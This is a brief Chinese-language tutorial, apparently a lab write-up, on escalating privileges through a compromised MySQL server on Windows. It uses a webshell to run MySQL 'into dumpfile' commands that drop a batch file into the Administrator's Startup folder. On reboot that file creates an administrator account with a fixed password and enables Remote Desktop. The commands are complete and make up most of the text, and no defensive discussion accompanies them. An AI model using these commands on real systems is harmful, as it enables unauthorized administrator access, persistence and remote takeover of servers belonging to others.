开机启动项提权原理:利用mysql,将后门写入开机自启动项。同时因为是开机自启动,再写入之后,需要重启目标服务器。(这个要求mysql的权限就很高,至少是管理员权限甚至是system)
实验环境
- Windows Server 2008 R2 x64
- MySQL-5.5.15-(64-bit).msi
- 菜刀
模拟实验
在菜刀中输入select "net user zs 123.com /add & net localgroup Administrators zs /add" into dumpfile "C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.bat"执行
然后双击启动中出现的文件,这时用户创建成功并且是管理员组
也可输入select "net user zs 123.com /add & net localgroup Administrators zs /add & REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal' 'Server /v fDenyTSConnections /t REG_DWORD /d 0 /f" into dumpfile "C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.bat"同时开启3389端口
这时就可以用桌面远程连接了
C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\(windows2003及xp的路径)